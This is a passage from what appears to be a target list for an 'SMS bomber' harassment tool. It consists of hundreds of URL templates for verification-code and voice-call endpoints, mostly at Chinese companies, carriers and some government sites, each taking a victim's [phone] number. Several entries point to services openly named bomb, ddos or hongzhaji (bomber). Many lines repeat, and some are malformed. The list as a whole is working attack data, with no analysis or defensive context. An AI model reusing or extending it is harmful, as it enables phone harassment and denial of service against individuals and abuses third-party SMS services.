"http://passport.kuaichecaifu.com/UserForDeayou/phoneCode?callbackparam=jsonpReturn&phone=&agent=[phone]&_=1500773935216", - "http://passport.centanet.com/m/page/ajax/20C79442F06E.ashx?Act=SetCode&phone=[phone]", - "https://sso-c.souche.com/loginApi/getCaptchaUrlByPhone.json?app=tangeche&phone=[phone]", - "http://114.55.104.205/api/auth/send?mobile=&access_token=[phone]", - "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=[phone]", - "http://user.daojia.com/mobile/getcode?mobile=[phone]", - "http://m.tk.cn/tkmobile/orderSentSmsServlet?mobile=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", - "http://cms.51fenmi.com/api/base/public/getCode?mobile=[phone]", - "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", - "http://www.baixing.com/m/oz/verify/?fromS9=1&identity=[phone]&mobile=[phone]", - "http://www.52gcc.com/bomb/index.php?hm=[phone]", - "http://shxd.jienihua100.com/api/user/getcode?mobile=[phone]&regcode=AC04B8AE-5A73-41D1-8694-3EFD04FEB059", - "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "http://api.v2.msparis.com/common/mobile?channel=App%20Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]&platform=ios-vest&rent_mode=2", - "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone%206s-12.4&login=[phone]&mob_type=1&platform=iphone&send_type=1&systemLaunguage=zh-Hans-CN", - "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", - "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", - "https://user.meilimei.com/taomi/user/sendSmsCaptcha?mobile=[phone]", - "http://api.v2.msparis.com/common/mobile?channel=App%20Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]&platform=ios-vest&rent_mode=2", - "https://webapi.account.mihoyo.com/Api/create_mobile_captcha?action_ticket=&action_type=regist&mobile=[phone]", - "http://sapi.16888.com/app.php?mod=account&extra=mobileCode&mobile=[phone]", - "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", - "http://www.weimaiyy.com/register/sms?t=0.6886729517940704&phone=[phone]", - "http://srmemberapp.srgow.com/sys/captcha/[phone]", - "http://case.100.com/captcha?source=57&mobile=[phone]&resend=0&mkey=customer", - "https://jdapi.jd100.com/uc/v1/getSMSCode?account=[phone]&sign_type=1&use_type=1", - "https://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", - "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=103", - "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&mobile=%2B86-[phone]&imgcode=&token=aa315477956d459f40b6f26c9090b790&sendtype=mobilemsgpwd&msgtype=1&captchaVersion=2&user_domain=cc&business_domain=&hpuid=924-ECmHmDZ0xdhMnXe-43&callback=reqwest_1589532775907030687", - "https://services.qiye.163.com/service/official/sendCode?jsonpcallback=jQuery190039810459070645865_1584688891341&mobile=[phone]&_=1584688891342", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://www.771ka.com/register/checkinfo?clientid=newmobile&newmobile=[phone]&_=1589617672457", - "http://app.syxwnet.com/?app=member&controller=index&action=sendMobileMessage&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", - "http://activity.renren.com/livecell/ajax/tryVerify?sanbox=a&phoneNum=[phone]", - "http://www.gangaimall.com/mbb-web/api/account/code?mobile=[phone]&type=0", - "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=[phone]", - "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=", - "http://api.passport.pptv.com/snsms/sendcode?cb=msSendCode&phoneNumber=[phone]&deviceId=p_1584518586025_48072460278550296&terminal=PC&channel=208000103005&uuid=0e2a64ae-e07e-49d6-852e-3de883df8003&imgCode=&format=jsonp&_=1584518959802", - "http://www.guaguale.men/api.php?act=user&key=rt1BThTaqQjjqbx1RD&phone=[phone]", - "http://www.txooo.com/Txooo/Main/BusinessRequirement/Ajax/BusinessRequirementAjax.ajax/SendMobileCode?mobile=[phone]", - "http://www.xlcidc.com/chkName.asp?umobie=[phone]&lm=sendmobi&sd=0.5806221691630391", - "http://www.imdxd.com/api/method/getCode?phone=[phone]&type=2", - "https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", - "https://john.ixiaolu.com/account/check_account_name?ab_ver=A&account_name=86-[phone]&app_channel=&device=iPhone8%2C1&device_id=5C351103-F887-4932-BC59-58C75875EFDE&login_user_id=0&pcid=ae1895f8187711a6bf727e6d14b0588d&phone_sn=9e633777bc1a27c4cb826b1a4c6309dd34eb80", - "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=+86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]&app_code=ECS-2233&msg_type=01", - "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone%206s-12.4&login=[phone]&mob_type=1&platform=iphone&send_type=1&systemLaunguage=zh-Hans-CN", - "http://shxd.jienihua100.com/api/user/getcode?mobile=[phone]&regcode=AC04B8AE-5A73-41D1-8694-3EFD04FEB059", - "http://www.weimaiyy.com/register/sms?t=0.6886729517940704&phone=[phone]", - "https://mobile.cmbchina.com/DUserManage/UserRegisterNew/URN_Register.aspx?phoneNo=[phone]&showtopbar=true&DeviceType=E&Version=7.1.2&SystemVersion=6.0.1&behavior_entryid=lgf005001", - "http://z.7qi.me/index.php?call=[phone]&ok=", - "https://qxin.info/oldfile/zha.php?NUMBER=[phone]&c=1&ok=", - "http://www.jiqinging.com/ajax.php?do=getCheckCode&tel=[phone]", - "https://api.daishangqian.com/v3/user/send-sms-code?phone=[phone]", - "http://user.memeyule.com/authcode/send_mobile?mobile=[phone]", - "http://account.bababus.com/wap/sendDynamicVerifyCode.htm?mobilePhone=[phone]", - "http://n.youyuan.com/v20/yuan/get_registerMobile_code.html?mobile=[phone]", - "http://passport.centanet.com/m/page/ajax/20C79442F06E.ashx?Act=SetCode+phone=[phone]", - "https://passport.1yyg.com/JPData?action=send2Msg+userMobile=[phone]", - "http://www.100ppi.com/ecp/ppi/get_sf/get_yzm.php?m=[phone]", - "http://www.suicunsuiqu.com/front/account/verifyMobileReg?mobile=[phone]", - "http://www.900index.com/api.php?a=sendsms+m=index+mobile=[phone]", - "http://mall.yyfq.com/installment/fws/user/sendMobileCode?mobile=[phone]", - "http://5.9188.com/activity/activityMobileCheck.go?id=qzkj&mobileno=[phone]", - "http://h5.gmccopen.com/act/sso!sendSms.action?mobile=[phone]", - "https://www.dfcd168.com/checkAndSendSms.html?mobile=[phone]", - "http://www.taoguba.com.cn/sendCodePC?codeType=ZCYZ+phoneNumber=[phone]", - "http://zntouzi.com/front/account/verifyMobileForReg?randomID=d2b07acd-917c-4d81-a849-9c694f25833b&code=111111&mobile=[phone]", - "http://www.jiqinging.com/ajax.php?do=getCheckCode+tel=[phone]", - "http://www.900index.com/api.php?a=sendsms&m=index&mobile=http://wjy138.haodai26.cn/sms.php?tel=[phone]", - "https://www.sztianjinsuo.com/user/sendPhoneCode?smsType=register&phone=[phone]", - "http://home.ecook.cn/user/code?phone=[phone]", - "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", - "http://api.pintx.cn/User/SendCommonSms?user_tel=[phone]", - "http://m.yunqiandai.com/mobileCode/sendMobileCodeV/reg?phone=[phone]", - "http://channel.xianjinxia.com/act/light-loan-xjx/registerCodeV3?picCode=0&phone=[phone]", - "http://www.yigongkeji.cc/mobile/weixiu/view/member/getSmsCode?mobile=[phone]", - "http://www.youmw.top/tool/dxhz/?hm=[phone]", - "http://www.ttpai.cn/signup/success?mobile=[phone]", - "http://appsfunc.e-giordano.com/SVC/AppsFunc.svc/rest/CheckUserName?username=[phone]", - "http://zhg.zhuyousoft.com/index.php?s=/Sms/sendSms&phone=[phone]", - "http://id.ourgame.com/mobilepassport!getMobileYzm.do?passport=[phone]", - "http://admin.bongv.com/Home/Modify/sendSmsCode_New.shtml?mp=[phone]", - "http://hdh.10086.cn/common/validationIP?phone=[phone]", - "http://tel.kuaishang.cn/cl.php?tel=[phone]", - "http://passport.lotour.com/reg/sendPhoneCode?callback=jQuery183022448778548277915_1465551896265&mobile=[phone]", - "http://biz.sandnes.cn/msgapi.php?phone=[phone]", - "http://interface.flnet.com/IAccount/GetRegisterSMSCode?cellphone=[phone]", - "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", - "http://ptlogin.4399.com/ptlogin/sendRegPhoneCode.do?phone=[phone]", - "http://yangba.syoogame.com/ajax/sendMobileVerifyCode?mobile=[phone]", - "http://www.sxyj.net/WebApi/Phone/SendPhone?phone=[phone]", - "http://www.team520.com/ddos/index.php?hm=[phone]", - "http://www.qmango.com/users/ajax/ajax_register_code.asp?_=1487743660579&mobile=[phone]", - "http://woa.sdo.com/woa/autologin/receiveVerificationSms.shtm?phone=[phone]", - "http://jx.kuwo.cn/KuwoLivePhone/user/sendSMS?mobile=[phone]", - "http://passport.fang.com/loginsendmsm.api?callback=jsonp1475917947591&Service=home-club-web&backurl=&mobilephone=[phone]", - "http://www.gghzj.cc/dx/dx/mini/index.php?hm=[phone]", - "http://www.yingegou.cn//api/v2/user/getSmsCode.do?mobile=[phone]", - "http://m.cibyun.com/User/SendRegistCCP?MemberUserId=-1&SellerUserId=null&X-Requested-By=m.cibyun.com&X-Requested-Data=qmjiyephkstunetjbbx&phone=[phone]", - "http://spi.lakala.com/wechat/weixin/signUp/getSMSCode.do?Mobile=[phone]", - "http://5.9188.com/user/sendSms.go?mobileNo=[phone]", - "http://user.memeyule.com/authcode/send_mobile?china=true&mobile=[phone]", - "http://api.yoyo360.cn/rest/authcode/send.json?18286967362=[phone]", - "http://www.zjsgat.gov.cn:8080/was/portals/cxfw/checkusermobile.jsp?mobilephone=[phone]", - "http://dns.shboka.com:22009/F-ZoneService/getValidNumber?phone=[phone]", - "http://user.zhangyoubao.com/passwords/getVerifyCode?mobile=[phone]", - "http://api.yinka.co/common/sms?cellphone=[phone]", - "http://www.jc258.cn/signup/send_sms?mobile=[phone]", - "http://svr.cnoa.cn/api/sms.oatry.user.php?jsonpcallback=jsonp1480990856832&task=send&mobile=[phone]", - "http://vipapp.yunjiweidian.com/yunjiapp4buyer/app4buyer/generateSmsCode.json?phone=[phone]", - "http://m.egou.com/validate_phone.htm?phone=[phone]", - "http://www.51zouchuqu.com/sms/send?mobileNo=[phone]", - "http://api.hhyp58.com/basis/sendCheckCode?mobile=[phone]", - "http://www.lawyersuperman.com/checkCellphone?cellphone=[phone]", - "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", - "http://api.beequick.cn/logging/beforeVerifySMS?msisdn=[phone]", - "http://pubacc.mobile.qq.com/mqqweb-pubacc/mqqweb/cgi-bin/lightalk/msgnewsend?phone=[phone]", - "http://home.ecook.cn/user/code?phone=[phone]", - "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", - "http://api.pintx.cn/User/SendCommonSms?user_tel=[phone]", - "http://m.yunqiandai.com/mobileCode/sendMobileCodeV/reg?phone=[phone]", - "http://channel.xianjinxia.com/act/light-loan-xjx/registerCodeV3?picCode=0&phone=[phone]", - "http://www.yigongkeji.cc/mobile/weixiu/view/member/getSmsCode?mobile=[phone]", - "http://www.youmw.top/tool/dxhz/?hm=[phone]", - "http://www.ttpai.cn/signup/success?mobile=[phone]", - "http://www.jsvideo.tv/sendMsg?phone=[phone]", - "http://u.danongchang.cn/User/CheckUserMess.aspx?type=3&dhhm=[phone]", - "http://appsfunc.e-giordano.com/SVC/AppsFunc.svc/rest/CheckUserName?username=[phone]", - "http://zhg.zhuyousoft.com/index.php?s=/Sms/sendSms&phone=[phone]", - "http://id.ourgame.com/mobilepassport!getMobileYzm.do?passport=[phone]", - "http://admin.bongv.com/Home/Modify/sendSmsCode_New.shtml?mp=[phone]", - "http://hdh.10086.cn/common/validationIP?phone=[phone]", - "http://tel.kuaishang.cn/cl.php?tel=[phone]", - "http://passport.lotour.com/reg/sendPhoneCode?callback=jQuery183022448778548277915_1465551896265&mobile=[phone]", - "http://biz.sandnes.cn/msgapi.php?phone=[phone]", - "http://interface.flnet.com/IAccount/GetRegisterSMSCode?cellphone=[phone]", - "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", - "http://ptlogin.4399.com/ptlogin/sendRegPhoneCode.do?phone=[phone]", - "http://47.88.105.195:8080/admin-web/buyers/getVercode.htm?mobile=[phone]", - "http://www.edu-edu.com/cas/web/message/send?phone=[phone]&isNewPhone=true", - "https://api.guanggao.com/user/sendcheckcode?mobile=[phone]&val=&type=0&platform=Android", - "https://v4.passport.sohu.com/i/smcode/mobile/sblmobile?mobile=[phone]&way=1&appid=116005&callback=passport403_cb1596534389025&_=1596534591810", - "https://bj.yqbiao.com/UserInfoArea/Users/GetSmsCodeForReg?tel=[phone]", - "https://m.ke.qq.com/cgi-bin/tool/apply_sms_code?is_ios=0&raw_phone=[phone]&phone=[phone]&national_code=86&from=1&bkn=1557826707&_=1596758267792", - "https://v4.passport.sohu.com/i/smcode/mobile/sblmobile?mobile=[phone]&way=1&appid=116005&callback=passport403_cb1596534389025&_=1596534591810", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery17205960549095114636_1596719990361&req_time=1596720031540&mobile=[phone]&unicom_number=0&_=1596720031543", - "https://m.300.cn/verify/message?is_ajax=1&callback=jQuery19109805433584210501_1596669590055&mobile=[phone]&_=1596669590060", - "https://api.rrsjk.com/oauth2/sms/send_vertify_code.do?mobile=[phone]&captcha=&captcha_id=", - "https://api.rrsjk.com/oauth2/sms/send_vertify_code.do?mobile=[phone]&captcha=&captcha_id=", - "http://m.login.httpcn.com/login/LoginCode?callbackparam=jQuery111106766551584217104_1592824186799&val=[phone]&_=1592824186801", - "http://gj.liansuosoft.com/ShopRegister/SendSms?mobile=[phone]", - "https://www.d7w.net/index.php?g=Member&m=Api&a=getmobilecode_binding&j=json&mobile=[phone]", - "https://www.zx123.cn/member/register.php?action=getcode&ajax=1&mobile=[phone]", - "https://sso.agora.io/api/verify/sms?phone=%2B86+131+5822+6398&lang=cn&country=CN&captcha=[phone]", - "http://dopzuul.dd2007.cn/shangji/officeWebInterface/getYzmByMobile.dd?mobile=[phone]&jsoncallback=jsonpCallback_success&_=1599135066051", - "https://host.convertlab.com/sms/get?mobile=[phone]&name=Convertlab&token=4080fdef3cb44298852d226af95b2502&type=form&uuid=4a48dbfe8e1d49ab87715d2ed8e6e79d", - "https://www.tuiyizx.com/v2/cellphone/?m=get&cellphone=%2B86%20[phone]&action=check", - "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", - "http://api.qingmang.me/v1/account.sendVerification?token=&phone=%2B86[phone]&code=70428334", - "http://walk-prod.bohanyuedong.com/api/message/sendV2?phone=[phone]&app_id=2&timestamp=1599549118&channel_id=000&device_id=F9D6949590A78676215E2CD28D7539342F42B1A8&os=25&version=1.0.1&sign=af2b1f5cd686f61176655c7528819b26&imei=861271047037119&imei_device_id=94086F8106D8651CDC5B90160F11B56BD0AECC00", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]&callback=jQuery17209171715653229815_1599374652809&_=1599374671117", - "https://www.znds.com/plugin.php?id=tshuz_smslogin:mobile&mod=send&phone=[phone]&type=1&hash=e5038cde", - "https://prod.huohuaschool.com/api-website/user/sms?phone=[phone]&type=6", - "http://puser.hnzwfw.gov.cn:8081/api/user/sms?mobile=[phone]&_=1592528454449", - "https://www.114yygh.com/web/common/verify-code/get?_time=1592546859053&mobile=[phone]&smsKey=LOGIN", - "http://sa.ec-ego.com:8080/sms/smsCode/getCode?mobilePhone=[phone]&type=register&exp=JMS", - "http://srmemberapp.srgow.com/sys/captcha/://gj.liansuosoft.com/ShopRegister/SendSms?mobile=[phone]", - "https://api-v5-0.yangcong345.com/captchas/v4.8?phone=[phone]&code=CN&type=codeVerify", - "http://srmemberapp.srgow.com/sys/captcha/[phone]", - "http://juniorapi.gzxiangqi.cn/juniorAccounts/v2/getCode/3/[phone]", - "http://uss.lenovomm.com/accounts/1.4/sendVerifyCode?msisdn=[phone]", - "http://juniorapi.gzxiangqi.cn/juniorAccounts/v2/getCode/3/[phone]", - "", - "https://api.rrsjk.com/oauth2/sms/send_vertify_code.do?mobile=[phone]&captcha=&captcha_id=", - "http://srmemberapp.srgow.com/sys/captcha/[phone]", - "https://card.10010.com/ko-order/messageCaptcha/send?phoneVal=[phone]", - "http://ptlogin.4399.com/ptlogin/sendPhoneLoginCode.do?phone=[phone]&appId=www_home&v=2&sig=&t=1592615855903&v=2", - "https://login.koolearn.com/sso/sendVoiceRegisterMessage.do?callback=jQuery111205661385064312077_1594952633553&type=jsonp&mobile=[phone]&msgInterval=60&imageCode=&countryCode=86&country=CN&_=1594952633566", - "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery18303956739664829656_1592495501835&phone=[phone]&type=5&nation=CN&from_domain=yjs_h5&verifycode=&_=1592495526803", - "https://m.exmail.qq.com/cgi-bin/sell_dependent?action=send_sms&t=wap_official_mgr&ef=jsnew&type=6&area=86&mobile=[phone]&r=0.6184749692742786", - "https://graph.3vjia.com/captcha/mobile/reg/[phone]?moblieImgCaptcha=", - "http://walk-prod.bohanyuedong.com/api/message/sendV2?phone=[phone]&app_id=2&timestamp=1599549118&channel_id=000&device_id=F9D6949590A78676215E2CD28D7539342F42B1A8&os=25&version=1.0.1&sign=af2b1f5cd686f61176655c7528819b26&imei=861271047037119&imei_device_id=94086F8106D8651CDC5B90160F11B56BD0AECC00", - "http://yangba.syoogame.com/ajax/sendMobileVerifyCode?mobile=[phone]", - "http://www.sxyj.net/WebApi/Phone/SendPhone?phone=[phone]", - "http://m.xymens.com/index.php/Home/User/send_code?mobile=[phone]", - "http://e.huijimall.com/api/store/rest/v2/zhutest/request_login_smscode?mobile=[phone]", - "http://passport.fang.com/loginsendmsm.api?MobilePhone=[phone]", - "http://www.ehuu.com/apiv4/clientApicheckPhone?phoneNum=[phone]", - "http://wo10010sh.cn/ticket/?a=[phone]", - "http://cash.herjk.com/herjk-server/user/authcode?mobile=[phone]", - "http://mall.yyfq.com/installment/fws/user/sendMobileCode?mobile=[phone]", - "http://h5.gmccopen.com/act/sso!sendSms.action?mobile=[phone]", - "http://id.ourgame.com/mobilepassport!getMobileYzm.do?passport=[phone]", - "http://www.maizjr.com/register/identifyingcode.json?mobile=[phone]", - "http://13668291681.ftxmall.net/sms/send?mobile=[phone]", - "https://www.limi88.com/get_request_sms_times?phone=[phone]", - "http://passport.fang.com/loginsendmsm.api?MobilePhone=[phone]", - "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", - "http://m.yunqiandai.com/mobileCode/sendMobileCodeV/reg?phone=[phone]", - "http://www.happigo.com/shop/index.php?act=login&op=send_auth_code&mobile=[phone]", - "http://tools.wx6.org/dianhuahongzhaji/?telcode=[phone]", - "http://u.danongchang.cn/User/CheckUserMess.aspx?type=3&dhhm=[phone]", - "http://118.178.230.82:8081/front/smsLogin.do?sign=2688a8ff469c6a19aeff8c70cfd5444e&platformCode=HUIYING&stime=1483258437244&token=35228404066186&smsType=LOGIN_VERIFY&cell=[phone]", - "http://zhg.zhuyousoft.com/index.php?s=/Sms/sendSms&phone=[phone]", - "http://ser.syccy.com/PhoneApi/NewSendMemberCodeForSMS?Phone=[phone]", - "http://www.yingegou.cn//api/v2/user/getSmsCode.do?mobile=[phone]", - "http://tel.kuaishang.cn/cl.php?tel=[phone]", - "http://www.weloan.com/front/account/verifyMobile?mobile=[phone]", - "http://interface.flnet.com/IAccount/GetRegisterSMSCode?cellphone=[phone]", - "http://api.yinka.co/common/sms?cellphone=[phone]", - "api.php?hm=[phone]", - "http://tools.wx6.org/duanxinhongzhaji/?telcode=[phone]", - "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", - "http://api.duo17.com/sendsms.do?os_type=android&app_version=2.4.0.0&device_id=860903034476097&pnum=[phone]", - "http://m.yunqiandai.com/mobileCode/sendMobileCodeV/reg?phone=[phone]", - "http://www.happigo.com/shop/index.php?act=login&op=send_auth_code&mobile=[phone]", - "http://www.gghzj.cc/dx/dx/mini/index.php?hm=[phone]", - "http://mkxq.zymk.cn/user/v1/mobilevc/?callback=jQuery321016123103253181426_1503210785449&mobile=[phone]&service=mkn&_=1503210785451 ", - "http://www.atmyjr.com/user/ashx/ajax.ashx?action=telyuyin&mid=17433&v=1439377001052&txtMobile=[phone]", - "http://www.atmyjr.com/user/ashx/ajax.ashxaction=telyuyin&mid=17433&v=1438962406156&txtMobile=[phone]", - "http://www.ezhe.com/api/verifyCode?phone=[phone]&type=2&smsType=1", - "http://www.rrjc.com/sendVoiceCodeByType.do?username=[phone]", - "http://www.line0.com/usercenter/voiceVerificationCodeUserLogin.do?mobile=[phone]", - "http://www.91zcp.com/reg/getVoiceCode?phone=[phone]", - "http://www.puyitou.com/service.html?SERVERID=770010&BIZ_CODE=REG_PHONE_CODE&PHONE_NUM=[phone]&SEND_TYPE=2", - "http://www.puyitou.com/service.html?SERVERID=770010&BIZ_CODE=REG_PHONE_CODE&PHONE_NUM=[phone]&SEND_TYPE=2", - "http://www.line0.com/usercenter/voiceVerificationCodeUserLogin.do?mobile=[phone]&voiceType=login", - "https://www5.rayvision.com/yxzCode!send.action?type=2&toPhone=[phone]", "https://sso.jrj.com.cn/sso/ajaxSendVoice?mobile=[phone]", - "http://www.rrjc.com/sendVoiceCodeByType.do?username=[phone]&regType=1&v_module=toNoviceRegistered", - "http://haojue78.com/WS/WSAccount.asmx/SendMobileMsg?mobile=[phone]", - "https://www.xintongdai.com/customer/login/register/acquirePhoneAgreeItem?phone=[phone]", - "http://www.hotouzi.com/register/register_sms.html?telephone=[phone]&token=", - "http://my.baihe.com/Getinterregist/getPhoneVerifyCode?jsonCallBack=jQuery18306001467584540825_1439706800918&type=2&phone=[phone]&_=1439707017074", - "http://u.panda.tv/ajax_send_sms?_jp=jQuery112408335659883577431_1478711837703&regionId=86&mobile=[phone]", - "http://passport.aplus.pptv.com/2015usercenter/api/sendphonecode/?phoneNum=[phone]", - "http://zhg.zhuyousoft.com/index.php?s=/Sms/sendSms&phone=[phone]", - "http://ser.syccy.com/PhoneApi/NewSendMemberCodeForSMS?Phone=[phone]", - "http://www.chaojitao.cn/index.php?act=login&op=send_reg_sms&f=reg&mobile=[phone]", - "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", - "http://ruzhu.jd.com/user/sendVC?phone=[phone]", - "http://edms.fcbox.com/hibox/weixin/getVerifyCode?mobilePhone=[phone]", - "http://api.zhuangdianbi.com/api/sendSms?phone=[phone]", - "http://www.dingapp.com/sendUserValidCode.action?mobile=[phone]", - "http://www.hcoriental.com/api/v1/user/auth_code/?phone=[phone]", - "http://www.patfun.com/do.php?ac=check_sms&phone=[phone]", - "http://i.pptv.com/2015usercenter/api/sendphonecode/?phoneNum=[phone]", - "https://www.xiongmaojinfu.com//user/index/sendSms?mobile=[phone]", - "http://www.variflight.com/login/reg/sendSms?AE71649A58c77&phone=[phone]", - "http://m.bidcenter.com.cn/JsonHandler/QuickRegisterValidateCode.aspx?mobiles=[phone]", - "http://ws.sythealth.com/wsbyte/fit/v4/sms/validatorcode?form=0&account=[phone]", - "http://m.bidcenter.com.cn/JsonHandler/QuickRegisterValidateCode.aspx?mobiles=[phone]", - "http://user.memeyule.com/authcode/send_mobile?mobile=[phone]", - "http://m.51awifi.com/msv2/sms/send?callback=jQuery111307387434379197657_1489515690497&mobile=[phone]", - "http://ld.liandan100.com/ldmgr/api/user/sendVerifySms?platform=1&versionNum=53&&r=&partnerId=[phone]", - "http://www.jiedianqian.com/api/account/send_verify_code.do?mobile=[phone]", - "http://m.yaya.cn/tools/web_submit.ashx?action=reg_get_mobile_code&mobile=[phone]", - "http://www.zhichiwangluo.com/index.php?r=Login/phoneResetCode&phone=[phone]", - "https://api.daishangqian.com/v2/user/send-sms-code?phone=[phone]", - "http://www.98xianyou.com/passport/sign/code.html?mobile=[phone]", - "http://xq.ibaihe.com/register/captcha?phone=[phone]", - "http://member.ehaier.com/sendMobileSmsVerify.html?mobile=[phone]", - "https://www.jdpay.com/login/register/sendActiveCode.htm?tel=[phone]", - "http://app.bczp.cn/pk/GetCode.ashx?mobile=[phone]", - "http://daogou.zdl123.com/daogou/webService?mobile=[phone]", - "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]", - "http://www.wsngo.com/reg/sendSmsCheck.html?phone=[phone]", - "http://www.yingegou.cn//api/v2/user/getSmsCode.do?mobile=[phone]", - "http://admin.bongv.com/Home/Modify/sendSmsCode_New.shtml?mp=[phone]", - "http://spi.lakala.com/wechat/weixin/signUp/getSMSCode.do?Mobile=[phone]", - "http://tel.kuaishang.cn/cl.php?tel=[phone]", - "http://www.weloan.com/front/account/verifyMobile?mobile=[phone]", - "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]", - "http://vis3.renwuto.com/VerifyCode/SendReg?tk=[phone]", - "http://biz.sandnes.cn/msgapi.php?phone=[phone]", - "http://interface.flnet.com/IAccount/GetRegisterSMSCode?cellphone=[phone]", - "http://api.yinka.co/common/sms?cellphone=[phone]", - "http://wap.10010.com/mobileService/tuiguang/sendMsg.htm?mobileNumber=[phone]", - "http://api.nfapp.southcn.com/nanfang_if/getVerifiCode?phoneNo=[phone]", - "http://www.v5kf.com/member/index/ajax_get_sms_code?mobile=[phone]", - "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", - "https://www.sxcfu.com/user/verifyPhone?phone=[phone]", - "http://www.cmpassport.com/openapi/sendDynaPwd?account=[phone]", - "http://api.66yxq.com:8075/gateway-web/send.htm?mobile=[phone]", - "http://www.loho88.com/activ_check_mobile.php?activ_id=67&activ_type=mis&part_id=body_1_4&goods_id=100&is_new_customers_allow=0&phone=[phone]", - "http://api.jb669.com:9000/jinbang/login/verifyPhone.do?phoneCode=[phone]", - "http://118.178.230.82:8081/front/smsLogin.do?sign=2688a8ff469c6a19aeff8c70cfd5444e&platformCode=HUIYING&stime=1483258437244&token=35228404066186&smsType=LOGIN_VERIFY&cell=[phone]", - "https://m.ule.com/user/getRegValidateCode?mobile=[phone]", - "http://ser.syccy.com/PhoneApi/NewSendMemberCodeForSMS?Phone=[phone]", - "http://mobile.rrjc.com/mobile/service.do?operate=2&VersionValue=V2.3.2&vc=29&paramMap.hardwareDpi=1280x720&paramMap.androidBrand=Android&paramMap.hardwareVersion=NoxW&paramMap.systemVersion=4.4.2&type_method=IDX_SENDCODENOLOGIN&appLineNumber=20161123132705&userAppId=f4b7d231-42d5-4220-880a-21223a874c2b&signRrjcMsg=03fb3195732bf4b53cbfe65c342d3980&paramMap.cellphone=[phone]", - "http://db.3z.cc/index.php?tp=front/reg&appid=0&pt=1&ver=2.2.4&imei=352286900745893&sign=c225f84dad88d1c3521fb0ec39e77d5c&op=verify&phone=[phone]", - "http://wx.imlaidian.com/testapi/authCodeGet?callback=jQuery1113009964326163753867_1483628589051&mobile=[phone]", - "http://admin.bongv.com/Home/Modify/sendSmsCode_New.shtml?mp=[phone]", - "http://passport.1yyg.com/JPData?action=send2Msg&userMobile=[phone]", - "http://www.weloan.com/front/account/verifyMobile?mobile=[phone]", - "http://user.memeyule.com/authcode/send_mobile?china=true&mobile=[phone]", - "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]", - "http://vis3.renwuto.com/VerifyCode/SendReg?tk=[phone]", - "http://biz.sandnes.cn/msgapi.php?phone=[phone]", - "http://interface.flnet.com/IAccount/GetRegisterSMSCode?cellphone=[phone]", - "http://w4.duoyi.com/p_user/DoNewActCards.aspx?gate=sw&jsoncallback=jQuery18303232165043277003_1483854401800&act=getsmscode&phone=[phone]", - "http://sms.maogoo.cn/index.php?hm=[phone]", - "http://zha.vvoso.com/?zha=[phone]&x=10", - "http://www.zsbox.net/api/call/index?user_id=244127&auth_key=c602e6ebb2311895b922d5bef854dc87&type=c&proxy_id=148455&phones=[phone]", - "http://511xy.pw/?hone=[phone]&s=3&admin=666&", - "http://www.zsbox.net/api/call/index?user_id=244127&auth_key=c602e6ebb2311895b922d5bef854dc87&type=c&proxy_id=148455&phones=[phone]", - "http://gd.10086.cn/easy/product/order/getValidateRndCode.jsps?commCode=LLKC300&merchantCode=GD&mobile=[phone]", - "http://511xy.pw/?hone=[phone]&s=1&admin=666", - 